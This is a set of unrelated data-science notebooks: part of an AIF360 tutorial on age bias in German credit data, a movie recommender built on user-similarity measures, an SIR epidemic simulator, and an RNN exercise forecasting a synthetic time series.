Step 2 Load dataset, specifying protected attribute, and split dataset into train and testIn Step 2 we load the initial dataset, setting the protected attribute to be age. We then split the original dataset into training and testing datasets. Although we will use only the training dataset in this tutorial, a normal workflow would also use a test dataset for assessing the efficacy (accuracy, fairness, etc.) during the development of a machine learning model. Finally, we set two variables (to be used in Step 3) for the privileged (1) and unprivileged (0) values for the age attribute. These are key inputs for detecting and mitigating bias, which will be Step 3 and Step 4. What is the German Credit Risk dataset?The original dataset contains 1000 entries with 20 categorial/symbolic attributes prepared by Prof. Hofmann. In this dataset, each entry represents a person who takes a credit by a bank. Each person is classified as good or bad credit risks according to the set of attributes. The original dataset can be found at https://archive.ics.uci.edu/ml/datasets/Statlog+%28German+Credit+Data%29 Loading datasetprotected_attribute means the attribute on which the bias can occur, basically the attribute you want to test bias for.privileged_classes means a subset of protected attribute values which are considered privileged from a fairness perspective.In the german dataset: Old (age >= 25) are the privileged class and Young (age < 25) are the unprivileged class.Here we have binary membership in a protected group (age) and this is a binary classification problem.Here, age -> sensitive attribute and Old (age >= 25) is the protected group -> historically systematic advantage group. The dataset is already encoded as the algorithms need the dataset to have numerical values and not categorical.
###Code
dataset_orig = GermanDataset(protected_attribute_names=['age'], # this dataset also contains protected
# attribute for "sex" which we do not
# consider in this evaluation
privileged_classes=[lambda x: x >= 25], # age >=25 is considered privileged
features_to_drop=['personal_status', 'sex']) # ignore sex-related attributes
dataset_orig_train, dataset_orig_test = dataset_orig.split([0.7], shuffle=True)
privileged_groups = [{'age': 1}]
unprivileged_groups = [{'age': 0}]
print("Original one hot encoded german dataset shape: ",dataset_orig.features.shape)
print("Train dataset shape: ", dataset_orig_train.features.shape)
print("Test dataset shape: ", dataset_orig_test.features.shape)
###Output
Original one hot encoded german dataset shape: (1000, 57)
Train dataset shape: (700, 57)
Test dataset shape: (300, 57)
###Markdown
The object dataset_orig is an aif360 dataset, which has some useful methods and attributes taht you can explore:instance_weights: Weighting for each instance. All equal (ones) by default.metadata : returns a dict which contains details about the creation of the dataset.convert_to_dataframe : converts a structured dataset to a pandas dataframe.de_dummy_code = True : converts dummy-coded columns to categories. set_category = True : sets the de-dummy coded features to categorical type.More documentation is available at https://aif360.readthedocs.io/en/latest/modules/datasets.html.For now, we'll just transform it into a pandas dataframe.
###Code
df, dict_df = dataset_orig.convert_to_dataframe()
print("Shape: ", df.shape)
print(df.columns)
df.head(5)
###Output
Shape: (1000, 58)
Index(['month', 'credit_amount', 'investment_as_income_percentage',
'residence_since', 'age', 'number_of_credits', 'people_liable_for',
'status=A11', 'status=A12', 'status=A13', 'status=A14',
'credit_history=A30', 'credit_history=A31', 'credit_history=A32',
'credit_history=A33', 'credit_history=A34', 'purpose=A40',
'purpose=A41', 'purpose=A410', 'purpose=A42', 'purpose=A43',
'purpose=A44', 'purpose=A45', 'purpose=A46', 'purpose=A48',
'purpose=A49', 'savings=A61', 'savings=A62', 'savings=A63',
'savings=A64', 'savings=A65', 'employment=A71', 'employment=A72',
'employment=A73', 'employment=A74', 'employment=A75',
'other_debtors=A101', 'other_debtors=A102', 'other_debtors=A103',
'property=A121', 'property=A122', 'property=A123', 'property=A124',
'installment_plans=A141', 'installment_plans=A142',
'installment_plans=A143', 'housing=A151', 'housing=A152',
'housing=A153', 'skill_level=A171', 'skill_level=A172',
'skill_level=A173', 'skill_level=A174', 'telephone=A191',
'telephone=A192', 'foreign_worker=A201', 'foreign_worker=A202',
'credit'],
dtype='object')
###Markdown
Let's take a look at our primary variables of interest.
###Code
print("Key: ", dataset_orig.metadata['protected_attribute_maps'][1])
df['age'].value_counts().plot(kind='bar')
plt.xlabel("Age (0 = under 25, 1 = over 25)")
plt.ylabel("Frequency")
print("Key: ", dataset_orig.metadata['label_maps'])
df['credit'].value_counts().plot(kind='bar')
plt.xlabel("Credit (1 = Good Credit, 2 = Bad Credit)")
plt.ylabel("Frequency")
###Output
Key: [{1.0: 'Good Credit', 2.0: 'Bad Credit'}]
###Markdown
Take a minute to explore the relationship between these two variables. Do credit scores vary with age?
###Code
# Your code here
###Output
_____no_output_____
###Markdown
Step 3 Compute fairness metric on original training datasetNow that we've identified the protected attribute 'age' and defined privileged and unprivileged values, we can use aif360 to detect bias in the dataset. Mean Difference (same as statistical parity)Compare the percentage of favorable results for the privileged and unprivileged groups, subtracting the former percentage from the latter.The ideal value of this metric is 0.A value < 0 indicates less favorable outcomes for the unprivileged groups. This is implemented in the method called mean_difference on the BinaryLabelDatasetMetric class. The code below performs this check and displays the output, showing that the difference is -0.169905.
###Code
metric_orig_train = BinaryLabelDatasetMetric(dataset_orig_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print("Original training dataset")
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_orig_train.mean_difference())
###Output
_____no_output_____
###Markdown
Disparate ImpactComputed as the ratio of rate of favorable outcome for the unprivileged group to that of the privileged group. The ideal value of this metric is 1.0.A value 1 implies a higher benefit for the unprivileged group.
###Code
print("Original training dataset")
print("Disparate Impact = %f" % metric_orig_train.disparate_impact())
###Output
_____no_output_____
###Markdown
Explainers Text Explanations
###Code
text_expl = MetricTextExplainer(metric_orig_train)
json_expl = MetricJSONExplainer(metric_orig_train)
#print(text_expl.mean_difference())
#print(text_expl.disparate_impact())
###Output
Disparate impact (probability of favorable outcome for unprivileged instances / probability of favorable outcome for privileged instances): 0.7664297113013201
###Markdown
JSON Explanations
###Code
def format_json(json_str):
return json.dumps(json.loads(json_str, object_pairs_hook=OrderedDict), indent=2)
#print(format_json(json_expl.mean_difference()))
#print(format_json(json_expl.disparate_impact()))
###Output
{
"metric": "Disparate Impact",
"message": "Disparate impact (probability of favorable outcome for unprivileged instances / probability of favorable outcome for privileged instances): 0.7664297113013201",
"numPositivePredictionsUnprivileged": 63.0,
"numUnprivileged": 113.0,
"numPositivePredictionsPrivileged": 427.0,
"numPrivileged": 587.0,
"description": "Computed as the ratio of rate of favorable outcome for the unprivileged group to that of the privileged group.",
"ideal": "The ideal value of this metric is 1.0 A value < 1 implies higher benefit for the privileged group and a value >1 implies a higher benefit for the unprivileged group."
}
###Markdown
Step 4 Mitigate bias by transforming the original datasetThe previous step showed that the privileged group was getting 17% more positive outcomes in the training dataset. Since this is not desirable, we are going to try to mitigate this bias in the training dataset. As stated above, this is called _pre-processing_ mitigation because it happens before the creation of the model. AI Fairness 360 implements several pre-processing mitigation algorithms. We will choose the Reweighing algorithm [1], which is implemented in the `Reweighing` class in the `aif360.algorithms.preprocessing` package. This algorithm will transform the dataset to have more equity in positive outcomes on the protected attribute for the privileged and unprivileged groups.We then call the fit and transform methods to perform the transformation, producing a newly transformed training dataset (dataset_transf_train).`[1] F. Kamiran and T. Calders, "Data Preprocessing Techniques for Classification without Discrimination," Knowledge and Information Systems, 2012.` Reweighing: Reweighing is a data preprocessing technique that recommends generating weights for the training examples in each (group, label) combination differently to ensure fairness before classification. The idea is to apply appropriate weights to different tuples in the training dataset to make the training dataset discrimination free with respect to the sensitive attributes. Instead of reweighing, one could also apply techniques (non-discrimination constraints) such as suppression (remove sensitive attributes) or massaging the dataset — modify the labels (change the labels appropriately to remove discrimination from the training data). However, the reweighing technique is more effective than the other two mentioned earlier.
###Code
RW = Reweighing(unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
dataset_transf_train = RW.fit_transform(dataset_orig_train)
dataset_transf_train.instance_weights
len(dataset_transf_train.instance_weights)
###Output
_____no_output_____
###Markdown
Step 5 Compute fairness metric on transformed datasetNow that we have a transformed dataset, we can check how effective it was in removing bias by using the same metric we used for the original training dataset in Step 3. Once again, we use the function mean_difference in the BinaryLabelDatasetMetric class. We see the mitigation step was very effective, the difference in mean outcomes is now 0.0. So we went from a 17% advantage for the privileged group to equality in terms of mean outcome.
###Code
metric_transf_train = BinaryLabelDatasetMetric(dataset_transf_train,
unprivileged_groups=unprivileged_groups,
privileged_groups=privileged_groups)
print("Transformed training dataset")
print("Difference in mean outcomes between unprivileged and privileged groups = %f" % metric_transf_train.mean_difference())
print("Transformed training dataset")
print("Disparate Impact = %f" % metric_transf_train.disparate_impact())
###Output
_____no_output_____
###Markdown
Step 6: Try another algorithm!There are numerous other pre-processing mitigation algorithms implemented in aif360, described at the following link:https://aif360.readthedocs.io/en/latest/modules/preprocessing.htmlTake a minute to read about these options, then repeat Steps 4 and 5 above using a different algorithm. How do the fairness metrics compare? What could explain your similar/different results?
###Code
# Set up the pre-processing mitigation algorithm
# Fit and transform the data
# Compute fairness metrics using your transformed data
###Output
_____no_output_____ |
actividad1OOP.ipynb | ###Markdown
###Code
# importamos modulos
import numpy as np
import pandas as pd
# estos son para hacer graficos
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib notebook
class FilesManager():
def __init__(self,path):
pass
def readFileToPandas(self,fileName,separator,header):
if header==True:
return pd.read_csv(path+fileName, sep =separator, encoding = 'utf-8', header = 0)
else:
return pd.read_csv(path + fileName, separator, encoding="utf-8")
def saveFromPandasToFile(self,pandasObject,fileName,separator):
pandasObject.to_csv(path + fileName, sep=separator, encoding="utf-8")
class Graficos:
def __init__(self,datos,filesManager):
self.normalize=True
self.cm=datos.relations
self.labels=datos.genres
self.plt=plt
self.user_profiles = filesManager.readFileToPandas('user_profiles_frame.csv',';',True);
def createPlot(self,path):
if self.normalize:
self.cm = self.cm.astype('float') / self.cm.sum(axis=0)[:, np.newaxis]
print("Normalized matrix")
else:
self.cm = self.cm * 1e+2
print('Matrix, without normalization')
fig, ax = self.plt.subplots()
figsize=(10,20)
im = ax.imshow(self.cm, interpolation='nearest', cmap=self.plt.cm.Reds)
ax.set(xticks=np.arange(self.cm.shape[1]),
yticks=np.arange(self.cm.shape[0]),
xticklabels=self.labels, yticklabels=self.labels,
title="Relations matrix",
ylabel='GENRES',
xlabel='GENRES')
self.plt.xticks(rotation='vertical')
fmt = '.2f' if self.normalize else 'd'
thresh = self.cm.max() / 2.
for i in range(self.cm.shape[0]):
for j in range(self.cm.shape[1]):
ax.text(j, i, format(self.cm[i, j], fmt),
ha="center", va="center",
color="white" if self.cm[i, j] > thresh else "black")
fig.tight_layout()
self.plt.colorbar(im)
self.plt.savefig(path+"plot_realtions.png")
def getPlot(self):
return self.plt
def getUserProfiles(self):
list(self.user_profiles)
self.user_profiles = self.user_profiles.rename(columns = {'Unnamed: 0':'Index'})
self.user_profiles = self.user_profiles.drop(['(no genres listed)', 'Index'], axis = 1)
self.user_profiles = self.user_profiles.round(2)
self.user_profiles = self.user_profiles.set_index(['userId'])
self.user_profiles.head()
return self.user_profiles
import time
class Datos:
def __init_(self):
self.ratings
self.movies
self.ranked_movies
self.user_profiles_frame
self.user_id
self.user_profiles
self.genres_counts
self.genres
self.new_ratings
self.resume_scores
self.scores
self.n_ratings
self.means
self.counts
self.ids
def importData(self,path,filesManager,ratingsFile,moviesFile):
self.ratings = filesManager.readFileToPandas(ratingsFile,',',False)
self.movies = filesManager.readFileToPandas(moviesFile,',',False)
def getRatings(self):
return self.ratings
def getMovies(self):
return self.movies
def loadRankedMovies(self):
self.ranked_movies = pd.DataFrame()
self.ranked_movies["movieId"] = self.ratings[self.ratings["rating"] > 4.5]["movieId"].unique()
self.ranked_movies["title"] = [self.movies[self.movies["movieId"] == m_id]["title"].values.flatten()[0]for m_id in self.ranked_movies["movieId"]]
self.new_ratings= self.ratings[self.ratings["movieId"].isin(self.ranked_movies["movieId"])]
def getRankedMovies(self):
return self.ranked_movies
def setRankedMovies(self,rankedMovies):
self.ranked_movies=rankedMovies
def loadGenres(self,filesManager):
self.genres= ["Action", "Adventure", "Animation", "Children", "Comedy",
"Crime", "Documentary", "Drama", "Fantasy", "Film-Noir", "Horror",
"Musical", "Mystery", "Romance", "Sci-Fi", "Thriller", "War",
"Western", "(no genres listed)", "IMAX"]
self.scores = []
self.n_ratings = []
self.ids=[]
for g in self.genres:
for i, row in self.movies.iterrows():
if g in row["genres"]:
self.ids.append(row["movieId"])
collect_ratings = self.ratings[self.ratings["movieId"].isin(self.ids)]["rating"]
self.scores.append(collect_ratings.mean())
self.n_ratings.append(len(collect_ratings))
print("Genre: ", g, "done")
# creando el dataframe
self.resume_scores = pd.DataFrame()
self.resume_scores["genres"] = self.genres
self.resume_scores["scores"] = self.scores
self.resume_scores["n_ratings"] = self.n_ratings
# ordenamos por puntuacion media del genero
self.resume_scores = self.resume_scores.sort_values("scores", ascending=False)
# save csv
filesManager.saveFromPandasToFile(self.resume_scores,'resume_scores.csv',';')
#self.resume_scores.to_csv(path + "resume_scores.csv", sep=";", encoding="utf-8")
def definingUserProfiles(self,path):
self.user_profiles=[]
self.user_id=[]
tac = time.time()
for i, userid in enumerate(self.ratings["userId"].unique()):
self.genres_counts = {g: 0 for g in self.genres}
self.user_id.append(userid)
self.reviews = self.ratings[self.ratings["userId"] == userid]
for j, review in self.reviews.iterrows():
movie_match = self.movies[self.movies["movieId"] == review["movieId"]]
for k, match in movie_match.iterrows():
for category in match["genres"].split("|"):
if category in self.genres:
self.genres_counts[category] += 1
self.user_profiles.append(self.genres_counts)
if i%500 == 0:
tic = time.time()
print("Profile number: ", i, userid, "time: ", tic-tac)
tac = tic
# create only the first 10k profiles
if i>2e+3:
break
self.user_profiles_frame= pd.DataFrame()
self.user_profiles_frame["userId"] = self.user_id
total = [np.count_nonzero(self.ratings["userId"].values == id_) for id_ in self.user_id]
self.user_profiles_frame["total_reviews"] = total
for g in self.genres:
self.user_profiles_frame[g] = [profile[g]/total[i] for i,profile in enumerate(self.user_profiles)]
self.user_profiles_frame.to_csv(path+"user_profiles_frame.csv", sep=";", encoding="utf-8")
def calcularMedia(self,ranked_movies,ratings):
self.means = []
self.counts = []
tac = time.time()
for i, m_id in enumerate(ranked_movies["movieId"]):
# seleccionamos todos los ratings de un movieId
selected = self.ratings[ratings["movieId"] == m_id]["rating"]
# calculamos la media
self.means.append(selected.mean())
# calculamos el numero de ratings
self.counts.append(len(selected))
if i%200 == 0:
tic = time.time()
print("Iteration: ", i, tic-tac)
tac = tic
self.ranked_movies["meanScore"] = self.means
self.ranked_movies["numRatings"] = self.counts
self.ranked_movies = self.ranked_movies.sort_values(["meanScore", "numRatings"], ascending=False)
self.ranked_movies["meanScore"] = self.ranked_movies["meanScore"].round(2)
def createHeatmap(self):
indexed = {g: self.genres.index(g) for g in self.genres}
dims = len(self.genres)
self.relations = np.zeros((dims, dims))
for i, movie in self.movies.iterrows():
cats = movie["genres"].split("|")
# increase positions by 1
for cat in cats:
for cat_ in cats:
# it doesn't matter the qunatity we add up, we can multiply/
# rescale later. Samll one to go fast on this part
self.relations[indexed[cat], indexed[cat_]] += 1e-2
path = '/content/drive/'
print("**************************","Opennig files and loading data...","***********************",sep="\n")
from google.colab import drive
drive.mount(path)
path+='My Drive/'
filesManager=FilesManager(path)
print("**************************","Creating data structure...","***********************",sep="\n")
datos=Datos()
datos.importData(path,filesManager,'ratings.csv','movies.csv')
datos.loadRankedMovies()
print("**************************","Operatinng with data..","***********************",sep="\n")
datos.getRankedMovies().head()
datos.calcularMedia(datos.getRankedMovies(),datos.getRatings())
datos.getRankedMovies().to_csv(path+"top_scored_movies.csv", sep=";", encoding="utf-8")
datos.getRankedMovies().head(10)
#datos.getRankedMovies().head(5)
print("**************************","Clasification...","***********************",sep="\n")
datos.loadGenres(filesManager)
datos.definingUserProfiles(path)
datos.createHeatmap()
graficos=Graficos(datos,filesManager)
graficos.createPlot(path)
graficos.getPlot().show()
graficos.getUserProfiles().head()
from abc import ABC,abstractmethod
class Recommendation:
def __init__(self):
pass
from abc import ABC,abstractmethod
class Distance:
def __init__(self):
pass
@abstractmethod
def calculateDistance(self,userProfiles):
pass
import math as m
class EuclideanDistance(Distance):
def __init__(self):
Distance.__init__(self)
def calculateDistanceMath(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
columnsSum=0
for column in userProfiles.columns:
columnsSum+=(row[column]-nextrow[column])**2
dist[i-1].append(m.sqrt( columnsSum ))
return dist
def calculateDistanceNumpy(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
dist[i-1].append(np.linalg.norm(row.iloc[:]-nextrow.iloc[:]))
return dist
import math as m
class PearsonDistance(Distance):
def __init__(self):
Distance.__init__(self)
pass
def calculateDistanceMath(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
dist[i-1].append(self.correlation(row,nextrow))
return dist
def calculateDistanceScipy(self,userProfiles):
dist=[]
for i,row in userProfiles.iterrows():
dist.append([])
for b,nextrow in userProfiles.iterrows():
dist[i-1].append(np.corrcoef(row.iloc[:],nextrow.iloc[:])[0,1])
return dist
def mean(self,list1):
total = 0
for a in list1:
total += float(a)
mean = total/len(list1)
return mean
def standarDev(self,list1):
listMean = self.mean(list1)
dev = 0.0
for i in range(len(list1)):
dev += (list1[i]-listMean)**2
dev = dev**(1/2.0)
return dev
def correlation(self,list1, list2):
xMean = self.mean(list1)
yMean = self.mean(list2)
xStandarDev = self.standarDev(list1)
yStandarDev = self.standarDev(list2)
rNumerator = 0.0
for i in range(len(list1)):
rNumerator += (list1[i]-xMean)*(list2[i]-yMean)
rDenominator = xStandarDev * yStandarDev
r = rNumerator/rDenominator
return r
user_profiles = filesManager.readFileToPandas('user_profiles_frame.csv',';',True);
user_profiles = user_profiles.rename(columns = {'Unnamed: 0':'Index'})
user_profiles = user_profiles.drop(['(no genres listed)', 'Index'], axis = 1)
user_profiles = user_profiles.round(2)
user_profiles = user_profiles.set_index(['userId'])
user_profiles = user_profiles.drop(columns=['total_reviews'])
distanceEuclidean=EuclideanDistance()
distancePearson=PearsonDistance()
user_profiles=user_profiles[:10]
print("********* Similarity between User by ranked generes ******************")
print("********* Euclidean Distance Mathematical calculation*****************")
print(pd.DataFrame(distanceEuclidean.calculateDistanceMath(user_profiles)))
print("********* Euclidean Distance Numpy Calculation **********************")
euclideanDistanceDataFrame=pd.DataFrame(distanceEuclidean.calculateDistanceNumpy(user_profiles))
euclideanDistanceDataFrame=euclideanDistanceDataFrame.replace({ 0:np.nan})
print(euclideanDistanceDataFrame)
print("***********************************************************************")
print("***********************************************************************")
print("***********************************************************************")
print("********** Pearson Correlation Mathematical calculation ************")
print(pd.DataFrame(distancePearson.calculateDistanceMath(user_profiles)))
print("********** Pearson Correlation Scipy calculation ************")
pearsonDistanceDataFrame=pd.DataFrame(distancePearson.calculateDistanceScipy(user_profiles))
pearsonDistanceDataFrame=pearsonDistanceDataFrame.replace({ 1:np.nan})
print(pearsonDistanceDataFrame)
# distance
euclideanDistanceDataFrame["min"]=euclideanDistanceDataFrame.min(axis=1)
euclideanDistanceDataFrame["min_id"]=euclideanDistanceDataFrame.idxmin(axis=1)
print(euclideanDistanceDataFrame)
pearsonDistanceDataFrame["max"]=pearsonDistanceDataFrame.max(axis=1)
pearsonDistanceDataFrame["max_id"]=pearsonDistanceDataFrame.idxmax(axis=1)
print(pearsonDistanceDataFrame)
userId=int(input("Introduce tu userId[1-10]: "))
columnMin=euclideanDistanceDataFrame.iloc[userId-1]["min_id"]
filmsRecomendedForUser=datos.ratings.loc[datos.ratings['userId']==columnMin+1]
filmsUserViewed=datos.ratings.loc[userId-1]
moviesFromUser=datos.movies.loc[datos.movies['movieId'].isin(filmsRecomendedForUser['movieId'])]
viewedMovies=datos.movies.loc[datos.movies['movieId'].isin(filmsUserViewed)]
finalRecomendation=moviesFromUser[~moviesFromUser.isin(viewedMovies)]
finalRecomendation=finalRecomendation.dropna()
print("*********************** Recomendations from user:",int(columnMin)," To user:",userId,"**************")
print(finalRecomendation[{'title','genres'}])
print()
columnMax=pearsonDistanceDataFrame.iloc[userId-1]["max_id"]
filmsRecomendedForUser=datos.ratings.loc[datos.ratings['userId']==columnMax+1]
filmsUserViewed=datos.ratings.loc[userId-1]
moviesFromUser=datos.movies.loc[datos.movies['movieId'].isin(filmsRecomendedForUser['movieId'])]
viewedMovies=datos.movies.loc[datos.movies['movieId'].isin(filmsUserViewed)]
finalRecomendation=moviesFromUser[~moviesFromUser.isin(viewedMovies)]
finalRecomendation=finalRecomendation.dropna()
print("*********************** Recomendations from user:",int(columnMax)," To user:",userId,"**************")
print(finalRecomendation[{'title','genres'}])
print()
###Output
*********************** Recomendations from user: 5 To user: 8 **************
title genres
1 Jumanji (1995) Adventure|Children|Fantasy
2 Grumpier Old Men (1995) Comedy|Romance
4 Father of the Bride Part II (1995) Comedy
5 Heat (1995) Action|Crime|Thriller
6 Sabrina (1995) Comedy|Romance
.. ... ...
811 Sleepers (1996) Thriller
812 Aladdin and the King of Thieves (1996) Animation|Children|Comedy|Fantasy|Musical|Romance
815 Willy Wonka & the Chocolate Factory (1971) Children|Comedy|Fantasy|Musical
822 Candidate, The (1972) Drama
824 Bonnie and Clyde (1967) Crime|Drama
[312 rows x 2 columns]
|
.ipynb_checkpoints/Simulator-checkpoint.ipynb | ###Markdown
The model we initially considered is the Susceptible-Infected-Recovered (SIR). A slight generalization of it is the Susceptible-Infected-Exposed-Recovered (SIER). Since there is enough information available about the incubation period of Covid-19, it might be worth implementing both in first place. Starting with SIR, the dynamic equations are given by:$$\dot{S} = -\frac{\beta}{N} SI \\\dot{I} = \frac{\beta}{N} SI - \gamma I \\\dot{R} = \gamma I \\S + I + R = N$$Where $R_0 = \beta/\gamma$ represents the average growth rate of the virus.For a discrete time model a forwards Euler integration should suffice. We introduce the SIR class for an easier API. The following objects can be used for the evolution of the population within a single compartment of the population.
###Code
class CompartmentManager(object):
"""Supposed to take care of arbitrary many cells once implemented"""
def __init__(self):
pass
class SRI(object):
def __init__(self, beta=0.2, gamma=0.5, S0=999, I0=1, R0=0):
self.S0 = S0
self.I0 = I0
self.R0 = R0
self.beta = beta
self.gamma = gamma
self.reset()
self.N = S0 + I0 + R0
def increments(self, other=None, link=0.1):
I = self.currentI if other is None else self.currentI + link*other.currentI
deltaS = -self.beta*self.currentS*I/self.N
deltaR = self.gamma*self.currentI
deltaI = -deltaS - deltaR
return (deltaS, deltaI, deltaR)
def integrate(self):
pass
def evolve(self, days, tqdm=False):
if tqdm:
for i in tqdm(range(days)):
self.integrate()
else:
for i in range(days):
self. integrate()
def reset(self):
self._S = [self.S0]
self._I = [self.I0]
self._R = [self.R0]
@property
def currentS(self):
return self._S[-1]
@property
def currentI(self):
return self._I[-1]
@property
def currentR(self):
return self._R[-1]
@property
def time_elapsed(self):
return len(self.S)
@property
def time(self):
return np.arange(self.time_elapsed)
@property
def S(self):
return np.array(self._S)
@property
def I(self):
return np.array(self._I)
@property
def R(self):
return np.array(self._R)
class DeterministicSRI(SRI):
def __init__(self, **kargs):
super().__init__(**kargs)
def integrate(self, other=None, link=0.1):
(deltaS, deltaI, deltaR) = self.increments(other=other, link=link)
newS = self.currentS + deltaS
newI = self.currentI + deltaI
newR = self.currentR + deltaR
self._S.append(newS)
self._I.append(newI)
self._R.append(newR)
class StochasticSRI(SRI):
def __init__(self, **kargs):
super().__init__(**kargs)
def integrate(self, other=None, link=0.1):
(deltaS, deltaI, deltaR) = self.increments(other=other, link=link)
jumpS = -min(np.random.poisson(lam=np.abs(deltaS)), self.currentS)
jumpR = min(np.random.poisson(lam=np.abs(deltaR)), self.currentI)
jumpI = -(jumpS + jumpR)
newS = self.currentS + jumpS
newI = self.currentI + jumpI
newR = self.currentR + jumpR
self._S.append(newS)
self._I.append(newI)
self._R.append(newR)
# example use
params = {'beta' : 0.5, 'gamma' : 0.3, 'S0' : 999, 'I0' : 1, 'R0' : 0}
model1 = DeterministicSRI(**params)
model1.evolve(days=100)
model2 = StochasticSRI(**params)
model2.evolve(days=100)
xlabel = 'Days'
ylabel1 = 'Deterministic'
ylabel2 = 'Stochastic'
fig = plt.figure(figsize=(8,8))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(model1.time, model1.S, linewidth=2, label='Susceptible')
ax1.plot(model1.time, model1.I, linewidth=2, label='Infected')
ax1.plot(model1.time, model1.R, linewidth=2, label='Recovered')
ax2.plot(model2.time, model2.S, linewidth=2, label='Susceptible')
ax2.plot(model2.time, model2.I, linewidth=2, label='Infected')
ax2.plot(model2.time, model2.R, linewidth=2, label='Recovered')
set_ax(ax1, ylabel=ylabel1, legend=True)
set_ax(ax2, xlabel=xlabel, ylabel=ylabel2, legend=True)
plt.show()
# interacting cells
params2 = {'beta' : 0.5, 'gamma' : 0.3, 'S0' : 1000, 'I0' : 0, 'R0' : 0}
cell1 = DeterministicSRI(**params)
cell2 = DeterministicSRI(**params2)
link = 0.000001
days = 500
for i in range(days):
cell1.integrate(other=cell2, link=link)
cell2.integrate(other=cell1, link=link)
xlabel = 'Days'
ylabel1 = 'Cell1'
ylabel2 = 'Cell2'
fig = plt.figure(figsize=(8,8))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(cell1.time, cell1.S, linewidth=2, label='Susceptible')
ax1.plot(cell1.time, cell1.I, linewidth=2, label='Infected')
ax1.plot(cell1.time, cell1.R, linewidth=2, label='Recovered')
ax2.plot(cell2.time, cell2.S, linewidth=2, label='Susceptible')
ax2.plot(cell2.time, cell2.I, linewidth=2, label='Infected')
ax2.plot(cell2.time, cell2.R, linewidth=2, label='Recovered')
set_ax(ax1, ylabel=ylabel1, legend=True)
set_ax(ax2, xlabel=xlabel, ylabel=ylabel2, legend=True)
plt.show()
###Output
_____no_output_____ |
Time_Series_Data_Prediction_Using_RNN.ipynb | ###Markdown
###Code
!pip install tf-nightly-2.0-preview
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
print(tf.__version__)
def plot_series(time, series, format="-", start=0, end=None):
plt.plot(time[start:end], series[start:end], format)
plt.xlabel("Time")
plt.ylabel("Value")
plt.grid(True)
def trend(time, slope=0):
return slope * time
def seasonal_pattern(season_time):
"""Just an arbitrary pattern, you can change it if you wish"""
return np.where(season_time < 0.4,
np.cos(season_time * 2 * np.pi),
1 / np.exp(3 * season_time))
def seasonality(time, period, amplitude=1, phase=0):
"""Repeats the same pattern at each period"""
season_time = ((time + phase) % period) / period
return amplitude * seasonal_pattern(season_time)
def noise(time, noise_level=1, seed=None):
rnd = np.random.RandomState(seed)
return rnd.randn(len(time)) * noise_level
time = np.arange(4 * 365 + 1, dtype="float32")
baseline = 10
series = trend(time, 0.1)
baseline = 10
amplitude = 40
slope = 0.05
noise_level = 5
# Create the series
series = baseline + trend(time, slope) + seasonality(time, period=365, amplitude=amplitude)
# Update with noise
series += noise(time, noise_level, seed=42)
plot_series(time,series,format='-')
split_time = 1000
time_train = time[:split_time]
x_train = series[:split_time]
time_valid = time[split_time:]
x_valid = series[split_time:]
window_size = 20
batch_size = 32
shuffle_buffer_size = 1000
def windowed_dataset(series, window_size, batch_size, shuffle_buffer):
dataset=tf.data.Dataset.from_tensor_slices(series)
dataset=dataset.window(size=window_size+1,shift=1,drop_remainder=True)
dataset=dataset.flat_map(lambda window:window.batch(window_size+1))
dataset=dataset.map(lambda window:(window[:-1],window[-1:]))
dataset=dataset.shuffle(shuffle_buffer)
dataset=dataset.batch(batch_size).prefetch(1)
return dataset
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
train_set = windowed_dataset(x_train, window_size, batch_size=128, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
tf.keras.layers.Lambda(lambda x: tf.expand_dims(x, axis=-1),
input_shape=[None]),
tf.keras.layers.SimpleRNN(40, return_sequences=True),
tf.keras.layers.SimpleRNN(40),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x * 100.0)
])
lr_schedule = tf.keras.callbacks.LearningRateScheduler(lambda epoch: 1e-8*10**(epoch/20))
optimizer = tf.keras.optimizers.SGD(lr=1e-8, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(train_set, epochs=100, callbacks=[lr_schedule])
plt.semilogx(history.history["lr"], history.history["loss"])
plt.axis([1e-8, 1e-4, 0, 30])
tf.keras.backend.clear_session()
tf.random.set_seed(51)
np.random.seed(51)
dataset = windowed_dataset(x_train, window_size, batch_size=128, shuffle_buffer=shuffle_buffer_size)
model = tf.keras.models.Sequential([
tf.keras.layers.Lambda(lambda x:tf.expand_dims(x,-1),input_shape=[None]),
tf.keras.layers.SimpleRNN(40,return_sequences=True),
tf.keras.layers.SimpleRNN(40),
tf.keras.layers.Dense(1),
tf.keras.layers.Lambda(lambda x: x*100.0)
])
optimizer = tf.keras.optimizers.SGD(lr=5e-6, momentum=0.9)
model.compile(loss=tf.keras.losses.Huber(),
optimizer=optimizer,
metrics=["mae"])
history = model.fit(dataset,epochs=400)
forecast=[]
for time in range(len(series) - window_size):
forecast.append(model.predict(series[time:time + window_size][np.newaxis]))
forecast = forecast[split_time-window_size:]
results = np.array(forecast)[:, 0, 0]
plt.figure(figsize=(10, 6))
plot_series(time_valid, x_valid)
plot_series(time_valid, results)
tf.keras.metrics.mean_absolute_error(x_valid, results).numpy()
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
#-----------------------------------------------------------
# Retrieve a list of list results on training and test data
# sets for each training epoch
#-----------------------------------------------------------
mae=history.history['mae']
loss=history.history['loss']
epochs=range(len(loss)) # Get number of epochs
#------------------------------------------------
# Plot MAE and Loss
#------------------------------------------------
plt.plot(epochs, mae, 'r')
plt.plot(epochs, loss, 'b')
plt.title('MAE and Loss')
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
plt.legend(["MAE", "Loss"])
plt.figure()
epochs_zoom = epochs[200:]
mae_zoom = mae[200:]
loss_zoom = loss[200:]
#------------------------------------------------
